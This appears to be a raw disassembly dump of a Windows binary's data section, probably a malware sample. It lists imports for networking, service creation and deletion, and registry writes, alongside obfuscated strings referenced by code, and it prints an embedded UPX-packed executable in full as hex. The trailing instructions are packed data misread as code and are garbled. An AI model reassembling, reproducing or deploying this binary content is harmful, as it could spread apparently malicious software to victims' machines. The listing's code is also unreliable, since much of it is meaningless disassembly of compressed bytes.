dd 44002500h, 61707369h, 4D686374h, 61737365h, 416567h
dd 50003D00h, 5174736Fh, 4D746975h, 61737365h, 6567h, 43004F00h
dd 74616572h, 6E695765h, 45776F64h, 4178h, 44005100h, 72747365h
dd 6957796Fh, 776F646Eh, 44005B00h, 69576665h, 776F646Eh
dd 636F7250h, 41h, 4300BF00h, 65736F6Ch, 76726553h, 48656369h
dd 6C646E61h, 65h, 4300C000h, 72746E6Fh, 65536C6Fh, 63697672h
dd 65h, 4400C300h, 74656C65h, 72655365h, 65636976h, 4F00D100h
dd 536E6570h, 6E614D43h, 72656761h, 41h, 4F00D300h, 536E6570h
dd 69767265h, 416563h, 52016700h, 65446765h, 6574656Ch
dd 756C6156h, 4165h, 52017100h, 72436765h, 65746165h, 4579654Bh
dd 4178h, 52017400h, 6C436765h, 4B65736Fh, 7965h, 52017900h
dd 704F6765h, 654B6E65h, 41784579h, 52018400h, 75516765h
dd 56797265h, 65756C61h, 417845h, 52019000h, 65536765h
dd 6C615674h, 78456575h, 41h, 5F00E800h, 616F7469h, 5F001800h
dd 7465475Fh, 6E69614Dh, 73677241h, 5F018100h, 65656C73h
dd 70h, 65020A00h, 746978h, 6D025400h, 70636D65h, 79h
dd 6D025600h, 65736D65h, 74h, 72026000h, 65736961h, 72026100h
dd 646E61h, 73026A00h, 616E6769h, 6Ch, 73026D00h, 6E697270h
dd 6674h, 73026F00h, 646E6172h, 73027100h, 61637274h, 74h
dd 73027200h, 68637274h, 72h, 73028000h, 74737274h, 72h
dd 6F737700h, 32336B63h, 6C6C642Eh, 0Fh dup(40500000h)
dd 4E495700h, 54454E49h, 4C4C442Eh, 40501400h, 45485300h
dd 32334C4Ch, 4C4C442Eh, 40502800h, 52454B00h, 334C454Eh
dd 4C442E32h, 4Ch, 15h dup(40503C00h), 45535500h, 2E323352h
dd 4C4C44h, 9 dup(40505000h), 56444100h, 33495041h, 4C442E32h
dd 4Ch, 0Bh dup(40506400h), 54524300h, 2E4C4C44h, 4C4C44h
dd 0Eh dup(40507800h), 25h dup(0)
dd 2000h, 0
dd 2000h, 100000h, 2A0000h, 300000h, 480000h
db 2 dup(0)
word_4421BE dw 817Ch ; DATA XREF: sub_40399B+19�o
db 0
byte_4421C1 db 0 ; DATA XREF: sub_403A5F+17�o
word_4421C2 dw 6960h ; DATA XREF: sub_403A5F+44�o
dd 3C3F3D2Fh
db 0
byte_4421C9 db 47h, 80h, 53h ; DATA XREF: sub_403A5F+88�o
db 36h, 6Ch, 0
dword_4421CF dd 203868h byte_4421D3 db 6Dh ; DATA XREF: sub_403A5F+DD�o
dd 367E4074h
db 0
byte_4421D9 db 77h, 2Dh, 67h ; DATA XREF: sub_403A5F+FC�o
db 7Ah, 0
word_4421DE dw 8121h ; DATA XREF: sub_403BE7+17�o
dd 23717664h
db 0
word_4421E5 dw 80h ; DATA XREF: sub_403BE7+125�r
byte_4421E7 db 44h ; DATA XREF: sub_403BE7+14C�o
dd 6C8164h
dword_4421EC dd 817430h dword_4421F0 dd 64312F20h db 59h, 0
dword_4421F6 dd 39324Ah align 4
dd 7, 0Ah
dword_442204 dd 0 ; sub_403FD8:loc_404007�r ...
word_442208 dw 58h ; DATA XREF: sub_40406B+15�r
word_44220A dw 5260h ; DATA XREF: sub_40406B+95�o
dd 51714D23h
db 0
byte_442211 db 7Fh, 2Fh, 69h ; DATA XREF: sub_40406B+CB�o
dd 733B26h
byte_442218 db 3Dh, 36h, 0 ; DATA XREF: sub_40406B+19F�o
byte_44221B db 2Dh ; DATA XREF: sub_40406B+1DF�o
dd 3939203Bh
db 61h, 0
dword_442222 dd 505866h align 4
dd 6, 0Eh
dword_442230 dd 0 ; .text:loc_404372�r ...
; HDESK hDesktop
hDesktop dd 0 ; DATA XREF: sub_4043CA+19�r
; sub_4043CA+49�r ...
dword_442238 dd 817Ch, 4, 0Ahdword_442244 dd 0 ; sub_404491:loc_4044BF�r ...
byte_442248 db 0 ; DATA XREF: sub_404529+2B�o
byte_442249 db 0 ; DATA XREF: sub_404529+1ED�o
word_44224A dw 204Bh ; DATA XREF: sub_40481B+31�o
dd 4D826943h
db 20h, 0
aByqv db 'BYQV',0 ; DATA XREF: sub_40481B+F1�o
a4lk db '&*4LK',0 ; DATA XREF: sub_40481B+158�o
dword_44225D dd 726254h dword_442261 dd 2B542Ch byte_442265 db 52h, 72h, 53h ; DATA XREF: sub_40481B+32E�o
dd 517F60h
dword_44226C dd 7226203Ah, 55606Dh, 6dword_442278 dd 0Ch ; sub_40506F+79�r
dword_44227C dd 0 ; sub_404E2A:loc_404E60�r ...
dword_442280 dd 354B5Eh dword_442284 dd 252C366Fh db 38h, 0
word_44228A dw 7F70h ; DATA XREF: sub_40506F+C�o
db 0
byte_44228D db 60h, 47h, 20h ; DATA XREF: sub_40506F+24�o
db 6Bh, 0
word_442292 dw 203Eh ; DATA XREF: sub_40506F+B7�o
dd 6860h, 7
dword_44229C dd 11h ; sub_4054C8+149�r ...
dword_4422A0 dd 0 ; sub_405138:loc_40515F�r ...
; volatile LONG Addend
Addend dd 0 ; DATA XREF: sub_4061F7+46�o
dword_4422A8 dd 2B70443Eh, 422782hdword_4422B0 dd 786D5F42h, 26776Bhword_4422B8 dw 4Dh ; DATA XREF: sub_4054C8+5B�r
word_4422BA dw 6351h ; DATA XREF: sub_4054C8+FB�o
dd 27586466h
db 0
byte_4422C1 db 4Eh, 59h, 0 ; DATA XREF: sub_4054C8+10E�o
dword_4422C4 dd 7F3A3Fh byte_4422C8 db 67h, 4Eh, 0 ; DATA XREF: sub_4054C8+1B0�o
dword_4422CB dd 615920h a70cg db '70cg',0 ; DATA XREF: sub_4054C8+277�o
byte_4422D4 db 0 ; DATA XREF: sub_4054C8+3B7�o
word_4422D5 dw 45h ; DATA XREF: sub_4054C8+3DA�r
byte_4422D7 db 49h ; DATA XREF: sub_4054C8+54A�o
dd 60547F6Fh
db 74h, 0
word_4422DE dw 3927h ; DATA XREF: sub_4054C8+588�o
dd 20364D6Ah
db 4Eh, 0
word_4422E6 dw 3E83h ; DATA XREF: sub_4054C8+71B�o
db 0
byte_4422E9 db 30h, 20h, 2Ch ; DATA XREF: sub_4054C8+7FF�o
db 61h, 0
word_4422EE dw 79h ; DATA XREF: sub_4054C8+83B�r
byte_4422F0 db 20h, 31h, 0 ; DATA XREF: sub_4054C8+8CD�o
byte_4422F3 db 62h ; DATA XREF: sub_405E88+1A�o
db 38h, 0
word_4422F6 dw 602Ch ; DATA XREF: sub_405E88+2D�o
dd 59303A7Ah
db 0
byte_4422FD db 4Eh, 77h, 20h ; DATA XREF: sub_405E88+A7�o
db 2 dup(20h), 0
byte_442303 db 20h ; DATA XREF: sub_405E88+154�o
dd 2B7961h
word_442308 dw 68h ; DATA XREF: sub_405E88:loc_4060A2�r
dword_44230A dd 784973h word_44230E dw 512Ah ; DATA XREF: sub_405E88+2F9�o
dd 204080h
dword_442314 dd 4A206925h db 0
dword_442319 dd 646942h byte_44231D db 53h, 3Fh, 58h ; DATA XREF: sub_4061F7+39�o
db 56h, 0
word_442322 dw 2F44h ; DATA XREF: sub_4061F7+121�o
dd 592766h
byte_442328 db 36h, 6Ch, 0 ; DATA XREF: sub_4061F7+141�o
byte_44232B db 7Fh ; DATA XREF: sub_4061F7+16C�o
dd 526E2A20h
db 0
dword_442331 dd 372A7Ch byte_442335 db 3Eh, 82h, 0 ; DATA XREF: sub_4061F7+207�o
dword_442338 dd 246F6E45h db 23h, 58h, 0
byte_44233F db 32h ; DATA XREF: sub_4061F7+278�o
dd 2D773133h
db 0
byte_442345 db 72h, 32h, 23h ; DATA XREF: sub_4061F7+296�o
dd 4025654Fh
db 0
dword_44234D dd 714B37h dword_442351 dd 533320h byte_442355 db 60h, 43h, 75h ; DATA XREF: sub_4061F7+447�o
db 52h, 48h, 0
byte_44235B db 63h ; DATA XREF: sub_4061F7+49B�o
dd 20h, 4
dword_442364 dd 0Dh dword_442368 dd 0 ; sub_406815:loc_40684B�r ...
dword_44236C dd 0 ; sub_406A40+34�r ...
dword_442370 dd 0 ; sub_406911+17�r ...
dword_442374 dd 0FFFFh ; sub_406A40+137�r ...
dword_442378 dd 52772D20h, 4F6960hdword_442380 dd 496E20h dword_442384 dd 3E425363h db 73h, 0
dword_44238A dd 657451h word_44238E dw 4124h ; DATA XREF: sub_406A40+85�o
dd 4C494F7Fh
db 6Ch, 0
word_442396 dw 5F30h ; DATA XREF: sub_406A40+DB�o
dd 507F66h
dword_44239C dd 4A2F7F41h, 4Fhdword_4423A4 dd 8 ; sub_406D2E+F14�r ...
dword_4423A8 dd 12h dword_4423AC dd 0 ; sub_406CA2:loc_406CCF�r ...
; DWORD ThreadId
ThreadId dd 1 ; DATA XREF: StartAddress+7C�r
; sub_407F07+23�o
byte_4423B4 db 0 ; DATA XREF: sub_406D2E+FD9�r
align 2
word_4423B6 dw 816Fh ; DATA XREF: sub_406D2E+19B�o
db 57h, 38h, 0
dword_4423BB dd 6D3520h byte_4423BF db 51h ; DATA XREF: sub_406D2E+1FD�o
dd 5A836E55h
db 0
byte_4423C5 db 4Bh, 78h, 41h ; DATA XREF: sub_406D2E+282�o
dd 4C2F2B66h
db 0
dword_4423CD dd 24614Dh dword_4423D1 dd 2C5E40h a4yk3 db '4Yk3',0 ; DATA XREF: sub_406D2E+3D2�o
aB db '~',0 ; DATA XREF: sub_406D2E+492�o
aZrsh db 'ZRSH',0 ; DATA XREF: sub_406D2E+4AD�o
aTxnve db 'TxN‚e',0 ; DATA XREF: sub_406D2E+51F�o
word_4423E8 dw 72h ; DATA XREF: sub_406D2E+535�r
word_4423EA dw 386Bh ; DATA XREF: sub_406D2E+548�o
dd 6F448230h
db 0
byte_4423F1 db 38h, 56h, 53h ; DATA XREF: sub_406D2E+5CC�o
db 5Eh, 26h, 0
dword_4423F7 dd 277C80h word_4423FB dw 38h ; DATA XREF: sub_406D2E+A31�r
byte_4423FD db 6Ch, 62h, 6Eh ; DATA XREF: sub_406D2E+A44�o
db 3Fh, 81h, 0
byte_442403 db 0 ; DATA XREF: sub_406D2E+AA4�o
byte_442404 db 68h, 3Ch, 0 ; DATA XREF: sub_406D2E+B8F�o
byte_442407 db 0 ; DATA XREF: sub_406D2E+C1F�o
dword_442408 dd 2D2079h byte_44240C db 0 ; DATA XREF: sub_406D2E+CF6�o
a1o8qz db '1o8QZ',0 ; DATA XREF: sub_406D2E+D1A�o
aKbX0 db 'k*x0',0 ; DATA XREF: sub_406D2E+DBB�o
word_442419 dw 20h ; DATA XREF: sub_406D2E+E00�r
byte_44241B db 4Ah ; DATA XREF: sub_406D2E+E5B�o
dd 204D6A76h
db 0
dword_442421 dd 3B4B20h byte_442425 db 27h, 47h, 35h ; DATA XREF: sub_406D2E+1001�o
db 61h, 48h, 0
byte_44242B db 0 ; DATA XREF: sub_406D2E+10B4�o
dword_44242C dd 0FFFFFFFFh, 407ED9h, 407EE4hdword_442438 dd 0 dd 8
dword_442440 dd 12h dword_442444 dd 0 ; sub_407FBC:loc_407FE9�r ...
dword_442448 dd 6B20517Eh db 79h, 0
word_44244E dw 5A4Dh ; DATA XREF: sub_40844F+84�o
db 90h
align 2
dw 3
dd 40000h, 0FFFF0000h, 0B80000h, 0
dd 400000h, 8 dup(0)
dd 0C80000h, 1F0E0000h, 0B4000EBAh, 0B821CD09h, 21CD4C01h
dd 73696854h, 6F727020h, 6D617267h, 6E616320h, 20746F6Eh
dd 72206562h, 69206E75h, 4F44206Eh, 6F6D2053h, 0D2E6564h
dd 240A0Dh, 13h dup(0)
dd 45500000h, 14C0000h, 88F20003h, 41CAh, 0
dd 0E00000h, 10B010Fh, 40000006h, 10000000h, 50000000h
dd 98200000h, 60000000h, 0A0000000h, 0
dd 10000040h, 2000000h, 40000h, 0
dd 40000h, 0
dd 0B0000000h, 10000000h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 0A0000000h, 0D80000h, 1Ch dup(0)
dd 50550000h, 3058h, 50000000h, 10000000h, 0
dd 4000000h, 3 dup(0)
dd 800000h, 5055E000h, 3158h, 40000000h, 60000000h, 3A000000h
dd 4000000h, 3 dup(0)
dd 400000h, 5055E000h, 3258h, 10000000h, 0A0000000h, 2000000h
dd 3E000000h, 3 dup(0)
dd 400000h, 0C000h, 42h dup(0)
db 0Ah
align 2
aInfoThisFileIs db '$Info: This file is packed with the UPX executable packer http://'
db 'upx.tsx.org $',0Ah,0
aIdUpx1_07Copyr db '$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Re'
db 'served. $',0Ah,0
dw 5055h
dd 90C2158h, 0A530902h, 0A837A262h, 72695F94h, 381F0000h
dd 70000000h, 4260000h, 7EE93800h, 4D009208h, 300905Ah
dd 3200043Bh, 0FFFFB2C8h, 0F97F40B8h, 4C8377Fh, 0EBA1F0Eh
dd 0CD09B400h, 4C01B821h, 73696854h, 0FDBF7020h, 6F72FFFFh
dd 6D617267h, 6E616320h, 20746F6Eh, 72206562h, 69206E75h
dd 534F4402h, 50ED6D20h, 646FFF60h, 0D0D2E65h, 50C7240Ah
dd 0DBED1345h, 14CFF21h, 888A0002h, 9DE041CAh, 6010B21h
dd 7EE90F08h, 0E022B3h, 10E018A4h, 0F9257325h, 20B6366h
dd 604501Eh, 0C96E676h, 710341Eh, 0F65E5920h, 29E0A006h
dd 0B2017578h, 17C6FDDh, 4D3864D8h, 37903F76h, 7865742Eh
dd 20A22B74h, 96CB6FFBh, 41A00EBh, 65722EE0h, 0CC636F6Ch
dd 677BECA6h, 2623FB9Eh, 107942A2h, 3703D95h, 2CDB3034h
dd 1226669Bh, 46E22FFAh, 9A691B30h, 0B423BAEh, 5E14032Ch
dd 0CD34D36Eh, 562C4AB2h, 4D867062h, 9C4D34D3h, 0E2D4C2AEh
dd 59AE9AF2h, 182D0836h, 463C0728h, 69A69A69h, 786C6254h
dd 9A69B28Eh, 0C6B49EA6h, 4D2F02E2h, 0F4CDB9D3h, 3972E0Ah
dd 344C3C24h, 5C34D34Dh, 9A8A7C6Ah, 0D34D34DBh, 0E6CEC0AAh
dd 59BF2EF2h, 243BA776h, 0F4031087h, 69A6E42Bh, 0CAD4A69Ah
dd 0BAACB6C0h, 0A29A6D60h, 0D72B9098h, 7B66B27Fh, 9603E9B6h
dd 78132F8Ah, 0FF880330h, 66D217FFh, 4F538130h, 41575446h
dd 4D5C4552h, 6F726369h, 0E5666F73h, 74FFFFFFh, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 0FB7F6853h, 536CDB6Fh, 6528760Ch, 656A624Fh, 10447463h
dd 6F4C7961h, 0AD6E6461h, 39477015h, 6739082Bh, 0A5FF3F4Dh
dd 0DB6C2006h, 72617041h, 6E656D74h, 0FA6E495Ch, 53035EDFh
dd 33023B63h, 4C430032h, 5C444953h, 0E77ED923h, 257B00BBh
dd 2D583830h, 0FA5D3404h, 7D0361DBh, 0FCEC8323h, 0F0E89090h
dd 0DEF75706h, 60BAFBBh, 78453759h, 7C737469h, 6046DE82h
dd 62694CFBh, 3B797172h, 656E686Bh, 0BF6ED76Ch, 5FB5DF67h
dd 57791B54h, 7DF60FD5h, 0B565DBFBh, 50677562h, 6CC76972h
dd 23656765h, 7850305Ch, 642E1ED7h, 50580F2Bh, 6F114F4Ch
dd 33D5B737h, 21727270h, 2B6261C5h, 6F667364h, 62360DECh
dd 732E126Fh, 35CBB79h, 0B835A0DDh, 5C214964h, 64723A5Dh
dd 8FB10B7Fh, 5F74511Ah, 5CEC1F33h, 65704F5Fh, 0FE57B218h
dd 4478566Eh, 706E6148h, 0B5AC006Eh, 2D4D37FFh, 4B59542Dh
dd 46475157h, 0E0A4A48h, 0F9ED6113h, 4245411Fh, 48534159h
dd 5B25464Ch, 7B096702h, 32020EFh, 30231205h, 0B0EF7BEEh
dd 0B3A0F32h, 1E331504h, 7FFC8360h, 4A455767h, 4A464B57h
dd 0AB414557h, 0FE9A13BBh, 5349444Eh, 1A034452h, 0A200FF97h
dd 0CBCB901Fh, 1FA60B6Eh, 91218D0Fh, 0A4BCB921h, 31232319h
dd 6D253525h, 0D97FD3h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 57740150h
push 24h
dec ch
imul ch
adc eax, 8D1E112Ch
inc ebp
lock push eax
or [eax], ebp
movzx eax, word ptr [ebp-6]
push eax
mov esi, ds:74F3CF20h
iret
; ---------------------------------------------------------------------------
db 0Ah, 0FCh, 50h
; ---------------------------------------------------------------------------
loc_442B80: ; CODE XREF: .text:00442B8E�j
add al, 0FEh
clc
div ah
db 66h
wait
sti
not dword ptr [eax-73h]
test [eax+5Bh], edi
jnz short loc_442B80
push 0D63826C0h
adc ch, cl
db 36h
mov ebx, 0FEB017ECh
push 0C4F14B4h
push 0FFFFFFB7h
sbb eax, 9904FB7Fh
pop ecx
idiv ecx
pop edi
fadd qword ptr [ebx+505205C2h]
sub cl, [esi+edx*8]
pop ebp
xor al, 10h
int 3 ; Trap to Debugger
mov ebp, 0C4832F73h
cmp ds:0B0685027h, dl
sub [ecx+7776DB3Bh], eax
pop ebx
; ---------------------------------------------------------------------------
dd 80A0BF8Fh, 12285750h, 5214220Fh, 647736Eh, 373015A4h
dd 7D330876h, 1766E6B0h, 6A2C310Bh, 0D8986809h, 0C9ECE761h
dd 28458830h, 66FDDB9Fh, 7909372Fh, 68234068h, 77866E02h
dd 606C986Eh, 0C95E5F12h, 0AEF22C3h, 18E11BEFh, 0A91D8B53h
dd 0FF336726h, 0EFFC7D89h, 0FFFCFF0Ah, 10C083D3h, 312C8950h
dd 0F08BDC1Ch, 0FF73B59h, 0EFDB2384h, 6A4937BAh, 3AE4680Ah
dd 21D1756h, 468D056Ah, 0DFB7F00Fh, 0F817B16h, 0D3B41859h
dd 0F467640h, 730FED6Ch, 570C1509h, 24122068h, 3FFB1475h
dd 0C73BDED9h, 18090E75h, 0EB026A04h, 0F84D8D23h, 1337F351h
dd 111CB3DBh, 5E2A2BF8h, 0C2105021h, 823B6EEDh, 5803FA08h
dd 840A13E9h, 0DD77FB62h, 300068F7h, 4C2E5783h, 3BD88B1Fh
dd 687D74DFh, 3AD95C14h, 10481BB7h, 0B70A0468h, 60440EF4h
dd 6ABFBB6Fh, 58F88BF6h, 2B58F868h, 3F45AC3h, 0C28D16F8h
dd 89F1F4BFh, 0CB2BC87Eh, 4689C103h, 7E22210Bh, 0E10DB86Eh
dd 23B05356h, 33E81040h, 0EC6FEEF6h, 0F43C2DFh, 56535056h
dd 8C3C1656h, 770974C6h, 9B8D17EEh, 0C710EB38h, 7EB0431h
dd 0ECDF3508h, 1A250699h, 7D8B0711h, 6A1611Bh, 51615B60h
dd 0F605746h, 66DF8E31h, 61FC96BBh, 0AF0F5424h, 0EB4A31Ch
dd 75FFFFDEh, 0B907A121h, 35247621h, 7BFBC069h, 0C82B7F7Ch
dd 0C2126851h, 2BD998EDh, 0D0F71D58h, 2D2474BFh, 0C7DCF6FBh
dd 155CC701h, 500CA756h, 6BCC033h, 0CA1DD33h, 0A1609A6Bh
dd 1A3B6C5Dh, 0D956D913h, 641A206Ah, 9D8DB438h, 0A2F0DE08h
dd 0B73816ECh, 3019D866h, 0F8C3522Eh, 0DA1B6B02h, 0E10C7DBh
dd 106A1301h, 0E9B3D537h, 14FCAD99h, 284BC610h, 0CD73A702h
dd 0FDD8780Dh, 7C514104h, 7A799D23h, 13E01511h, 59B5E078h
dd 44CF1F92h, 0DB541112h, 0ED372E9h, 83F08B74h, 3902F74h
dd 5B64D9E8h, 0A0567832h, 9D351270h, 6C572119h, 1F5E681Bh
dd 8986EF8Dh, 0DB33537Dh, 64405357h, 6FBDEE90h, 5B83E70Bh
dd 0BE566C74h, 0BF6AA218h, 538C6667h, 890F087Fh, 575015B5h
dd 3FD2D3ECh, 74C0858Ah, 67849F36h, 0E19939D6h, 74766CE6h
dd 84202613h, 71E3EB15h, 5B359BE1h, 895BFC14h, 0FC6157D9h
dd 5E3FB067h, 5B5FC38Bh, 5D8B048Dh, 53575608h, 0FDBEB7FEh
dd 3D66590Eh, 3F76C88Bh, 3C80D144h, 0D745C1Ah, 0FF6DC181h
dd 151FAF6Fh, 0EBEC77C9h, 3B664101h, 1B2373C8h, 0BE17FFC9h
dd 6DF002B4h, 1778F12Bh, 8148DC5h, 1A148A47h, 61059488h
dd 6D7B6376h, 7E6DC718h, 0C62F7AEBh, 90A618B7h, 245C644Ch
dd 0AF9D560Ch, 57FFDDB7h, 10247C8Bh, 197EDB85h, 2EAB0A6Eh
dd 7D1A6AC0h, 0FFFEE678h, 8861C280h, 3B463E14h, 80E77CF3h
dd 32001F24h, 2C02109Fh, 8FFFF8ECh, 84D8B0Ch, 0D895648h
dd 777550BCh, 237BF0C6h, 0A151930Bh, 536FF898h, 0B0B64F84h
dd 0FC1BDA0Bh, 2404C711h, 7B01C75Ch, 59D676F6h, 2E7559D7h
dd 13546815h, 0B37ECBF0h, 93B4E1Ah, 4080B27h, 0E1610CEBh
dd 68F1BDAFh, 0A929193Ch, 505959E0h, 95F7C358h, 0CC27027h
dd 1703189Bh, 0B3637289h, 6801FB3Dh, 0D1261294h, 3DA88F59h
dd 85BD95B7h, 1FE934Fh, 0BF5D940Eh, 64C9C9ADh, 7B575D9Ch
dd 7C9DF8F0h, 30BB6D93h, 9F6880A5h, 0B44EB1E1h, 0C0A359CDh
dd 0ACA43F00h, 315F5F7Bh, 12353C7Ch, 960C7024h, 4505B36Eh
dd 0E564BFA0h, 5A786657h, 6DB755A0h, 9B9C2613h, 5FDB93Dh
dd 0E8E6EBEBh, 34680CFCh, 6CC7580Ah, 7B167716h, 2733756Ah
dd 5F17E15Dh, 0E804F7E3h, 0E69FD8CDh, 0A2F18B76h, 0C79CFC18h
dd 41135006h, 0E3998C65h, 196A1A1Dh, 0B60514C0h, 26108D66h
dd 1F20B710h, 57816E74h, 257126Dh, 6F09B0C3h, 0D7611EB5h
dd 0B7518C8h, 2DC05935h, 147E89FFh, 57571CEBh, 0AC470957h
dd 3EB799BEh, 99741446h, 16012046h, 5FC68B1Ch, 0C6D77F68h
dd 6283568Dh, 44F6420Fh, 20010824h, 11DB66D8h, 1D5920D6h
dd 3DA21B5Eh, 0FB59BB6Fh, 9D5C8BEAh, 74037468h, 0DB768BD7h
dd 14ED95A3h, 5609F685h, 752A6146h, 0B7F6FB7Fh, 0F03BDF1Ch
dd 718D0375h, 8318515Bh, 392527FAh, 6752045h, 0FDB035B2h
dd 5104C183h, 20D003EBh, 14021847h, 0D674B3F5h, 4552AF10h
dd 1CC25DB4h, 0D8055EB6h, 7AC4B870h, 0E510E41Ah, 4FF42BEh
dd 20C46818h, 896A9A7Ah, 0CED8C847h, 86A00E4h, 0D8C8CC18h
dd 0C4202BD8h, 4C351016h, 0D03211D9h, 0B08D18D4h, 0B2C1A05h
dd 0D81B6914h, 8E7C1D19h, 0A04514h, 565E5308h, 12CC170Ah
dd 4D61605Eh, 660BB8FCh, 940AC604h, 83ABC040h, 0DDEDC0B3h
dd 21170BDh, 0EA8B0575h, 12CB3CEBh, 0C187CD06h, 6810AFBCh
dd 1A8A53A4h, 36276FCh, 3931EB76h, 0BA5D0C7Dh, 191E05D2h
dd 2EB17D0h, 5BB81EE0h, 30F6DD6Bh, 8D00575Fh, 0DC91AE71h
dd 344AC57Eh, 0E942189h, 6DAE08C2h, 0BF98F138h, 78570880h
dd 12DB098Eh, 85E8BEFh, 2F0C331h, 74C3FDF4h, 7449205Ch
dd 0C7C82C14h, 0A2659BA1h, 7AC4660Dh, 5C68DD4Ah, 4D6D46E2h
dd 510CEFE8h, 63FFBA4Fh, 0FC26F135h, 0C01BD8F7h, 5FC2456h
dd 9B5071E4h, 6FC5D483h, 0E59518A8h, 0B36AC503h, 0FFB191B7h
dd 753BC445h, 93C0940Fh, 1F068FB6h, 4A3EF9D9h, 0B18BCC26h
dd 4D17DE35h, 6895910h, 0CFA69106h, 0B986F977h, 8A040883h
dd 1010E04h, 5D270C46h, 106D78FBh, 7AD518E7h, 534244C7h
dd 76398D9Dh, 0F66AD943h, 57465945h, 0B2436206h, 3D06CB3Eh
dd 2B6DF6AAh, 0B54CB46Ch, 89630CC9h, 4B565F01h, 5DDC6214h
dd 418B4C5Bh, 0B455A420h, 314CDED6h, 3F6856E1h, 5D00A4CFh
dd 88661647h, 5741415h, 336CEB67h, 0A6278CDCh, 1DA9AAh
dd 9C1B6332h, 0F5E6803h, 2F6DB804h, 66602061h, 573B60Fh
dd 0BB648AFBh, 9897785Eh, 1261C10Bh, 52135868h, 0FBC228D0h
dd 0A1642E21h, 25896408h, 0C7CEA307h, 0D22CDDC6h, 0A5E86589h
dd 27240C29h, 7BD757F4h, 30BBBB0h, 0F86850C3h, 0B76CC0Ah
dd 4014E4B4h, 0E12E0F40h, 0B916D170h, 0AF3861E0h, 0A9522B34h
dd 6BFBF192h, 9B6990B3h, 94DC1AFAh, 85930D9Bh, 4390A153h
dd 5B4F9493h, 16F8B6EBh, 42392FE4h, 45F7DB08h, 0DA2DC0BFh
dd 7C5B3BC8h, 201E7C80h, 44C60573h, 6FE25A6Dh, 0EB402E06h
dd 1F76FFE9h, 0E0757546h, 86E1BC3h, 0E00381AEh, 0B9616480h
dd 3105BAB1h, 4D450CCh, 0A6DDA60Ch, 1D5FA246h, 50DA1E08h
dd 0CF3CD804h, 0D4D63CF3h, 9ED2CECCh, 46D979E7h, 746B60Ah
dd 6A040506h, 18F9EF9Eh, 2040308h, 53B60601h, 6A716023h
dd 58859215h, 0E8130340h, 98C95790h, 0BF723EC4h, 0C49A8598h
dd 50AE2350h, 6B6F683Fh, 21D00ADCh, 59504208h, 623E3786h
dd 0C483D911h, 0D20EEBFFh, 0C2BE1696h, 0C758BC3h, 0F185598Bh
dd 37D3D907h, 0CF1CBEFAh, 0E07D83h, 160EE070h, 96841A46h
dd 0B4F072CCh, 8A70F20Dh, 0D8FBCE71h, 0C9F0F468h, 0C8833811h
dd 0CDF6ABFFh, 9FA17C2Ch, 3B0C55C0h, 0D7992D6h, 0B42E9EA5h
dd 1DE677FCh, 7AF286E4h, 0BB4BFFFFh, 0CE8B135Eh, 0CA3BDCA6h
dd 48A2973h, 0C0458839h, 972303Ch, 1D73393Ch, 7D778F4Dh
dd 0D6AC0F8h, 74B84B0Ah, 8BE4797Fh, 6EBD8F1h, 0FD0EB41h
dd 28850F39h, 0BD1FEDBCh, 3BF64A8Dh, 5C1548F1h, 0DFFFFD73h
dd 8D0088D1h, 0C13B144Eh, 0C23B2A7Dh, 0C8A2673h, 0BC4D8838h
dd 9A2DF980h, 0A53B6B1h
dd 0C9595404h, 37DBDB77h, 253075DBh, 65830409h, 391000D4h
dd 0AFA0D44Dh, 76DED966h, 3B568DBFh, 8A1F75C2h, 0D8E8B838h
dd 80C9A78h, 43A41905h, 0D8CC36C1h, 0D4ADF8D6h, 5181802Eh
dd 3C62D0F6h, 8D0B0211h, 77770CD0h, 8D020FD8h, 1B503E04h
dd 3E440E02h, 639E0F02h, 46D0498Ch, 5C1180D3h, 8D00AD8h
dd 83C40B12h, 37B704C8h, 5C24AEEh, 0C40A7F32h, 4057C01h
dd 895D7E0Ch, 0A1A06237h, 6E31043Eh, 5AD40506h, 7530E6ECh
dd 74310607h, 30032C18h, 97AD1B0Bh, 6846D709h, 6D4A10D8h
dd 921418BBh, 0EA76E00Ah, 30A10B84h, 0C3C3C588h, 0E4239098h
dd 9CDB5878h, 0C5691967h, 5DB3D35Dh, 3C80FDB0h, 662E9EBFh
dd 2F4F048Bh, 7E10F2A0h, 0D7C35B9h, 0E33A097Fh, 0C33BC475h
dd 5321C972h, 61505BCBh, 2E5335BBh, 470C572Ah, 7EC59C62h
dd 7CB2BF08h, 75EB590Eh, 75CB3BC9h, 2CB0D332h, 5D5D974Ch
dd 0B34DEFC6h, 753DBF74h, 98479124h, 0B1640C10h, 9DCB3043h
dd 0C26F3394h, 0CBBBC3E9h, 0BE4C5306h, 1966900Bh, 4CACC84h
dd 5FF2C477h, 770465C2h, 0C483DA04h, 6A535330h, 0DF074C0Ah
dd 0FF0CACD6h, 20AB5325h, 0CE46497Ah, 27CCB815h, 0D91BD9AFh
dd 1EA8E4AAh, 9037D90Ch, 0A48D91h, 0F3A3A8A8h, 66F1A36Fh
dd 857C83h, 300A0710h, 304B0875h, 310CEC3Ch, 9E0F75BEh
dd 11C847FFh, 885216C8h, 394AE60h, 6EB7FA26h, 5CFD4B46h
dd 6212ECEBh, 57C33DC8h, 0C58B7D68h, 6177E80h, 0CE6D423Ah
dd 196D866Dh, 0F51A1CA5h, 29C11E05h, 936CD263h, 24D00C22h
dd 0D6FABE8h, 2B365EFEh, 9B3003F3h, 56EED1B8h, 6DAFC116h
dd 0C60E16F0h, 140A0DFFh, 0B472B54Ah, 6F202A2Ah, 50B33709h
dd 903722A8h, 11740BF0h, 28D1BF6Eh, 2B990F39h, 0EF8D1C2h
dd 56B1027Eh, 0F923EB63h, 0AB2C0D33h, 0D1CB7615h, 0F9D10F6Fh
dd 5F70818Dh, 66057E27h, 0E9A17FB7h, 0AC16EBACh, 3B0279FEh
dd 4173B87Dh, 2D2BB8F8h, 0EC1342F6h, 1F04AD90h, 2D726750h
dd 3DBC4B6h, 0D19015F7h, 55C7D8E8h, 0F336DB19h, 165543A3h
dd 6F470B0Eh, 1EDF647Dh, 3BF07FFFh, 8D067CF7h, 0BAEB017Eh
dd 0A4C7814Fh, 0FE3BA6E2h, 0FC1E0473h, 0F78BD5B6h, 0FC5F4EACh
dd 0AC752B00h, 90A17622h, 24A30Ch, 0A6040789h, 0A4FB5CD9h
